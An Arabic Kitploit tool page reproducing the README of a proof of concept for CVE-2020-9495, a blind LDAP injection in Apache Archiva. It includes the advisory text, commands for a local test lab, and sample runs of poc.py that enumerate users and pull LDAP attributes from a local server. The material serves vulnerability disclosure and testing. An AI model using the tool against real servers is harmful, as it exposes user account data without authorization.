Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-9495 — إثبات مفهوم لاستغلال CVE-2020-9495، وهي ثغرة حقن LDAP في Apache Archiva. يقوم بتعداد مستخدمي LDAP وسرقة قيم السمات التعسفية عبر الحقن الأعمى. | Kitploit
أدوات/GitHubGitHub/ggolawski/cve-2020-9495
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubggolawski/cve-2020-9495

CVE-2020-9495

إثبات مفهوم لاستغلال CVE-2020-9495، وهي ثغرة حقن LDAP في Apache Archiva. يقوم بتعداد مستخدمي LDAP وسرقة قيم السمات التعسفية عبر الحقن الأعمى.

عرض المستودع
8143منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-9495 PoC

CVE-2020-9495 هي ثغرة حقن LDAP متوسطة الخطورة في Apache Archiva قبل الإصدار 2.2.5. تسمح للمهاجم باسترجاع أي قيم لسمات LDAP للمستخدمين الموجودين على خادم LDAP.

من النشرة الأمنية الرسمية لـ Apache Archiva:

من خلال توفير قيم خاصة لنموذج تسجيل الدخول في Archiva، يمكن للمهاجم استرجاع بيانات سمات المستخدم من خادم LDAP المتصل. باستخدام أحرف معينة، من الممكن تعديل مرشح LDAP المستخدم للاستعلام عن المستخدمين على خادم LDAP المتصل. من خلال قياس زمن الاستجابة، يمكن استرجاع بيانات سمات اعتباطية من كائنات مستخدم LDAP.

PoC

يوضح السكربت poc.py كيف يمكن لمهاجم غير مصرح له تعداد المستخدمين على خادم LDAP المدمج مع Archiva وجلب قيمة أي سمة لأي مستخدم.

خادم اختبار Archiva المحلي

تخطَّ هذه الخطوة إذا كان لديك بالفعل خادم Archiva مع تفعيل مصادقة LDAP.

  1. نزّل Archiva 2.2.4 وفك ضغطه

    $ wget https://archive.apache.org/dist/archiva/2.2.4/binaries/apache-archiva-2.2.4-bin.tar.gz
    $ tar -zxf apache-archiva-2.2.4-bin.tar.gz
    
  2. شغّل خادم OpenLDAP

    $ docker run -p 2389:389 --name my-openldap-container osixia/openldap:1.3.0
    
  3. استورد المستخدمين من users.ldif إلى LDAP

    $ ldapadd -x -D "cn=admin,dc=example,dc=org" -w admin -H ldap://localhost:2389 -f users.ldif
    
  4. شغّل خادم Archiva

    $ bin/archiva console
    
  5. فعّل مصادقة LDAP وهيئها عبر واجهة الويب

تعداد المستخدمين

$ ./poc.py --url http://127.0.0.1:8080
[INFO] Enumerating users from http://127.0.0.1:8080
[INFO] Calibration...
[INFO] Calibration done
admin1
admin2
admin3
admin4
admin5
admin6
admin7
user1
user2
user3
user4

استرجاع قيم سمات LDAP للمستخدم admin1

$ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr mail
[INFO] Exfiltrating mail attribute of admin1 user from http://127.0.0.1:8080
[INFO] Calibration...
[INFO] Calibration done
[email protected]
$ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr givenName
[INFO] Exfiltrating givenName attribute of admin1 user from http://127.0.0.1:8080
[INFO] Calibration...
[INFO] Calibration done
admin1
$ ./poc.py --url http://127.0.0.1:8080 --user admin1 --attr sn
[INFO] Exfiltrating sn attribute of admin1 user from http://127.0.0.1:8080
[INFO] Calibration...
[INFO] Calibration done
last
تنزيل الأداة